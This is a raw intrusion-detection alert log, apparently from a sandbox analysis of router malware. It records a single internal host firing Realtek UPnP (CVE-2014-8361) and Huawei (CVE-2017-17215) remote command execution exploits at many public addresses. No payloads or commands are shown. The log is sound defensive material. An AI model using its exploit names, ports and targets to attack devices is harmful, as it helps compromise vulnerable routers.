                                                07/20/24-23:05:59.315621TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5468252869192.168.2.14113.77.223.1
                                                07/20/24-23:05:59.303078TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24287852869192.168.2.14148.3.120.99
                                                07/20/24-23:06:08.565771TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614081652869192.168.2.14115.163.246.125
                                                07/20/24-23:06:09.320815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4237252869192.168.2.14184.132.87.238
                                                07/20/24-23:05:53.423905TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23815652869192.168.2.14220.118.15.248
                                                07/20/24-23:05:59.221858TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614809852869192.168.2.14165.128.217.108
                                                07/20/24-23:05:59.251571TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3525252869192.168.2.1413.165.183.213
                                                07/20/24-23:05:33.859779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5378237215192.168.2.14157.176.218.10
                                                07/20/24-23:06:01.784582TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24405852869192.168.2.1417.146.227.125
                                                07/20/24-23:05:39.747656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5215837215192.168.2.1441.39.134.25
                                                07/20/24-23:05:42.127943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3678837215192.168.2.14157.156.135.191
                                                07/20/24-23:06:26.096786TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613960852869192.168.2.14102.191.130.120
                                                07/20/24-23:06:02.085078TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5717252869192.168.2.14202.241.41.21
                                                07/20/24-23:05:58.004179TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613731452869192.168.2.14107.90.243.251
                                                07/20/24-23:06:49.853581TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5564652869192.168.2.14135.195.82.21
                                                07/20/24-23:06:35.260557TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5003852869192.168.2.14207.136.193.67
                                                07/20/24-23:05:40.457644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3430452869192.168.2.14204.155.193.18
                                                07/20/24-23:05:40.342827TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23436652869192.168.2.1431.209.91.245
                                                07/20/24-23:06:11.305486TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615873052869192.168.2.1483.59.179.192
                                                07/20/24-23:06:24.491533TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3937452869192.168.2.14149.180.184.56
                                                07/20/24-23:06:53.169467TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4903652869192.168.2.142.56.91.127
                                                07/20/24-23:05:38.688553TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613917252869192.168.2.1412.148.108.18
                                                07/20/24-23:05:40.488770TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5188052869192.168.2.1479.209.117.180
                                                07/20/24-23:05:33.828884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5771637215192.168.2.14197.164.23.3
                                                07/20/24-23:05:56.022964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3290437215192.168.2.14136.47.60.180
                                                07/20/24-23:05:56.124566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3742037215192.168.2.14197.30.238.5
                                                07/20/24-23:05:52.459686TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25301652869192.168.2.14133.77.138.223
                                                07/20/24-23:05:34.659617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857637215192.168.2.14157.230.63.1
                                                07/20/24-23:06:10.772789TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614581052869192.168.2.14202.52.251.194
                                                07/20/24-23:06:41.550251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5287052869192.168.2.1452.30.74.250
                                                07/20/24-23:05:33.857328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932037215192.168.2.1491.98.242.170
                                                07/20/24-23:06:29.396094TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5380652869192.168.2.14145.225.20.14
                                                07/20/24-23:06:06.855214TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25287252869192.168.2.1418.214.245.19
                                                07/20/24-23:05:52.466707TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5745852869192.168.2.14157.170.39.12
                                                07/20/24-23:05:58.855356TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4231252869192.168.2.1419.228.35.122
                                                07/20/24-23:05:35.595549TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4985852869192.168.2.14111.192.150.203
                                                07/20/24-23:05:37.593936TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25520052869192.168.2.1480.164.32.127
                                                07/20/24-23:06:03.246248TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5291252869192.168.2.14114.102.232.116
                                                07/20/24-23:05:34.619289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3684837215192.168.2.14164.152.114.92
                                                07/20/24-23:06:01.363153TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615979052869192.168.2.14210.242.56.65
                                                07/20/24-23:06:11.535629TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615537452869192.168.2.14222.169.26.29
                                                07/20/24-23:06:45.315463TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3488252869192.168.2.14156.106.217.64
                                                07/20/24-23:05:36.577316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5544837215192.168.2.1441.12.50.91
                                                07/20/24-23:06:00.971446TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5795052869192.168.2.14133.98.16.57
                                                07/20/24-23:05:45.988990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4966837215192.168.2.14197.60.59.152
                                                07/20/24-23:05:57.518359TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3929452869192.168.2.14123.114.225.162
                                                07/20/24-23:06:33.320646TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5198452869192.168.2.14176.246.163.145
                                                07/20/24-23:06:16.628763TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614968452869192.168.2.14132.79.218.79
                                                07/20/24-23:05:55.877930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4306237215192.168.2.14197.227.9.209
                                                07/20/24-23:06:01.650758TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4113652869192.168.2.1413.146.163.137
                                                07/20/24-23:05:52.535101TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23495852869192.168.2.1498.101.208.247
                                                07/20/24-23:06:01.896425TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615398252869192.168.2.1499.117.47.20
                                                07/20/24-23:06:18.501276TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4226852869192.168.2.1438.62.197.212
                                                07/20/24-23:05:46.088778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4896037215192.168.2.14197.86.82.234
                                                07/20/24-23:07:01.438132TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5897252869192.168.2.1489.31.185.148
                                                07/20/24-23:05:56.953935TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5407852869192.168.2.14196.217.33.59
                                                07/20/24-23:05:57.466916TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3615652869192.168.2.14135.11.85.84
                                                07/20/24-23:05:34.653253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4333837215192.168.2.14197.144.99.86
                                                07/20/24-23:05:50.554912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5887037215192.168.2.14128.249.205.61
                                                07/20/24-23:06:09.712957TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615908852869192.168.2.14142.116.55.239
                                                07/20/24-23:05:46.240839TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615021852869192.168.2.14137.251.110.201
                                                07/20/24-23:05:57.518359TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3752452869192.168.2.14179.55.29.89
                                                07/20/24-23:06:15.664506TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24327452869192.168.2.14126.165.56.151
                                                07/20/24-23:05:40.365777TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23986652869192.168.2.1495.146.229.83
                                                07/20/24-23:05:57.960840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5439252869192.168.2.14169.13.159.45
                                                07/20/24-23:06:00.698150TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5496252869192.168.2.14182.27.195.239
                                                07/20/24-23:05:56.086216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4829437215192.168.2.1441.38.212.183
                                                07/20/24-23:05:56.449806TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4537852869192.168.2.1436.156.255.210
                                                07/20/24-23:06:26.096786TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4202852869192.168.2.1440.37.104.114
                                                07/20/24-23:05:59.454602TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613870452869192.168.2.14153.186.8.251
                                                07/20/24-23:06:01.185323TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5195852869192.168.2.1454.220.188.149
                                                07/20/24-23:05:47.129772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199837215192.168.2.14197.122.180.114
                                                07/20/24-23:05:47.359487TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5249052869192.168.2.14147.243.70.201
                                                07/20/24-23:06:01.374971TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4183052869192.168.2.1418.174.57.38
                                                07/20/24-23:05:45.416560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5647837215192.168.2.14197.166.98.215
                                                07/20/24-23:05:45.437584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3653637215192.168.2.1441.23.225.224
                                                07/20/24-23:06:03.405139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3488237215192.168.2.14197.184.171.197
                                                07/20/24-23:05:48.788274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5394037215192.168.2.14197.171.60.81
                                                07/20/24-23:05:42.271822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5928237215192.168.2.14197.150.152.219
                                                07/20/24-23:06:29.771660TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5177252869192.168.2.14134.155.249.12
                                                07/20/24-23:05:35.850972TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615089852869192.168.2.14143.165.147.195
                                                07/20/24-23:05:37.611139TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3389852869192.168.2.14164.159.1.86
                                                07/20/24-23:05:52.483885TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3928052869192.168.2.14155.53.167.191
                                                07/20/24-23:05:57.037944TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5966852869192.168.2.14170.235.254.81
                                                07/20/24-23:05:48.777005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497837215192.168.2.1441.243.199.56
                                                07/20/24-23:05:59.565815TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23731452869192.168.2.1497.170.235.212
                                                07/20/24-23:06:14.460726TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5724052869192.168.2.1486.179.103.234
                                                07/20/24-23:06:16.139087TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3332652869192.168.2.14176.120.158.229
                                                07/20/24-23:05:56.310476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4625237215192.168.2.1441.224.244.111
                                                07/20/24-23:05:56.316062TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3468252869192.168.2.14150.121.194.2
                                                07/20/24-23:05:39.050437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3667637215192.168.2.14116.205.214.70
                                                07/20/24-23:06:02.373413TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613764852869192.168.2.1469.155.223.182
                                                07/20/24-23:06:03.131822TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615562452869192.168.2.14220.74.16.80
                                                07/20/24-23:06:01.225562TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5765452869192.168.2.14130.0.101.52
                                                07/20/24-23:05:58.821284TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25481652869192.168.2.1419.148.221.102
                                                07/20/24-23:05:40.406154TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6085252869192.168.2.14183.189.61.173
                                                07/20/24-23:05:38.971654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5763837215192.168.2.1441.102.68.163
                                                07/20/24-23:05:57.133658TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24428452869192.168.2.14178.83.23.44
                                                07/20/24-23:05:35.260516TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3761052869192.168.2.1475.120.116.239
                                                07/20/24-23:06:14.916755TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5136452869192.168.2.14105.206.141.172
                                                07/20/24-23:05:40.339812TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24017852869192.168.2.14144.76.154.113
                                                07/20/24-23:06:40.564079TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614371252869192.168.2.1448.223.65.67
                                                07/20/24-23:06:56.793781TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4761852869192.168.2.1492.24.43.126
                                                07/20/24-23:05:59.106017TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5994252869192.168.2.14150.247.197.160
                                                07/20/24-23:05:40.471777TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23851452869192.168.2.1439.47.233.5
                                                07/20/24-23:05:37.441296TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23975252869192.168.2.1468.251.134.43
                                                07/20/24-23:06:06.363471TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3748252869192.168.2.14130.148.196.29
                                                07/20/24-23:06:10.453658TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5319252869192.168.2.14126.244.253.92
                                                07/20/24-23:06:12.549242TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615596252869192.168.2.1493.161.165.129
                                                07/20/24-23:06:53.637724TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25985452869192.168.2.14140.253.53.98
                                                07/20/24-23:05:38.601492TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614748652869192.168.2.1417.18.17.141
                                                07/20/24-23:05:52.493434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5214252869192.168.2.14105.68.61.194
                                                07/20/24-23:05:58.174966TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3493052869192.168.2.14184.183.98.168
                                                07/20/24-23:06:01.888773TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615973052869192.168.2.1464.149.50.56
                                                07/20/24-23:05:39.372597TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5635252869192.168.2.14136.85.95.150
                                                07/20/24-23:05:40.461168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5105652869192.168.2.14157.171.149.72
                                                07/20/24-23:05:48.754228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3325237215192.168.2.1441.23.169.46
                                                07/20/24-23:05:57.598746TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6086852869192.168.2.14168.67.89.55
                                                07/20/24-23:05:55.877930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5260837215192.168.2.14197.244.97.144
                                                07/20/24-23:06:07.506329TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614177252869192.168.2.14203.105.186.163
                                                07/20/24-23:06:00.781631TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25675652869192.168.2.14192.161.140.181
                                                07/20/24-23:06:56.793781TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5712252869192.168.2.14149.133.154.242
                                                07/20/24-23:05:59.338625TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5323252869192.168.2.14130.32.183.138
                                                07/20/24-23:06:00.164884TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4787052869192.168.2.1469.215.220.54
                                                07/20/24-23:05:40.326086TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24312252869192.168.2.1454.48.74.242
                                                07/20/24-23:05:52.565127TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25527252869192.168.2.14166.54.252.123
                                                07/20/24-23:05:59.382234TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615153652869192.168.2.14147.234.87.243
                                                07/20/24-23:06:06.038216TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5369052869192.168.2.14109.56.135.239
                                                07/20/24-23:05:37.517011TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25130452869192.168.2.14111.192.150.203
                                                07/20/24-23:05:38.949221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3603237215192.168.2.14197.93.226.135
                                                07/20/24-23:06:24.686159TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614670252869192.168.2.1435.5.176.100
                                                07/20/24-23:07:01.154408TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4542452869192.168.2.1478.217.58.236
                                                07/20/24-23:06:50.079146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5661252869192.168.2.1453.30.203.133
                                                07/20/24-23:05:36.325662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373837215192.168.2.1441.254.167.35
                                                07/20/24-23:06:01.214826TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4825252869192.168.2.14105.123.4.149
                                                07/20/24-23:05:33.859779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5361237215192.168.2.1441.165.255.30
                                                07/20/24-23:05:38.631980TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614892652869192.168.2.14183.253.82.115
                                                07/20/24-23:05:57.538013TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23382452869192.168.2.14211.48.36.13
                                                07/20/24-23:05:39.047734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4050237215192.168.2.1441.213.128.194
                                                07/20/24-23:05:57.809290TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613514852869192.168.2.14191.96.252.254
                                                07/20/24-23:05:52.516035TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24574852869192.168.2.1445.228.151.222
                                                07/20/24-23:05:35.352208TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615060052869192.168.2.14131.84.155.33
                                                07/20/24-23:05:56.219051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5514237215192.168.2.1441.96.4.19
                                                07/20/24-23:05:34.653253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5208437215192.168.2.14197.36.42.86
                                                07/20/24-23:05:58.716925TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24772452869192.168.2.1438.249.4.4
                                                07/20/24-23:05:37.445623TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4150452869192.168.2.14200.51.205.131
                                                07/20/24-23:05:45.988990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5751637215192.168.2.1441.17.231.76
                                                07/20/24-23:06:01.763636TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3541852869192.168.2.1459.29.225.212
                                                07/20/24-23:05:40.348098TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24536452869192.168.2.1440.98.198.13
                                                07/20/24-23:05:58.093159TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24059452869192.168.2.14191.202.11.9
                                                07/20/24-23:05:40.331312TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5797052869192.168.2.1497.189.105.6
                                                07/20/24-23:05:38.949221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740637215192.168.2.14157.24.79.77
                                                07/20/24-23:06:01.433779TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5193252869192.168.2.1423.28.207.2
                                                07/20/24-23:05:38.107285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4523652869192.168.2.1493.126.173.161
                                                07/20/24-23:05:47.327962TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4774852869192.168.2.14220.104.129.24
                                                07/20/24-23:05:56.705397TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5689852869192.168.2.1437.27.29.149
                                                07/20/24-23:06:19.742051TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3599652869192.168.2.14120.51.213.234
                                                07/20/24-23:05:57.787088TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23582652869192.168.2.14119.200.79.245
                                                07/20/24-23:05:36.327720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443637215192.168.2.14197.235.65.47
                                                07/20/24-23:05:37.472706TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5518052869192.168.2.1427.129.79.40
                                                07/20/24-23:05:35.994808TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4032652869192.168.2.1491.48.213.35
                                                07/20/24-23:05:38.957923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919037215192.168.2.14172.45.139.106
                                                07/20/24-23:05:52.514709TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24072452869192.168.2.14219.239.208.112
                                                07/20/24-23:06:13.512424TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613824052869192.168.2.14161.79.108.3
                                                07/20/24-23:05:46.113321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5838837215192.168.2.14108.195.38.35
                                                07/20/24-23:06:03.530128TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25190852869192.168.2.14152.73.13.116
                                                07/20/24-23:05:52.527430TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25295652869192.168.2.14122.228.47.35
                                                07/20/24-23:06:51.240850TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3552452869192.168.2.14120.112.236.136
                                                07/20/24-23:05:37.440705TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25525452869192.168.2.1474.170.109.218
                                                07/20/24-23:05:39.771399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5890037215192.168.2.14141.199.46.45
                                                07/20/24-23:05:37.453720TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3729852869192.168.2.14162.12.166.249
                                                07/20/24-23:06:02.122085TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5315852869192.168.2.14211.197.210.31
                                                07/20/24-23:05:52.515827TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24754652869192.168.2.14151.188.92.157
                                                07/20/24-23:05:42.245742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3802637215192.168.2.14181.177.50.143
                                                07/20/24-23:05:48.756259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4725837215192.168.2.14176.233.196.39
                                                07/20/24-23:06:04.222315TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24093652869192.168.2.1442.230.189.186
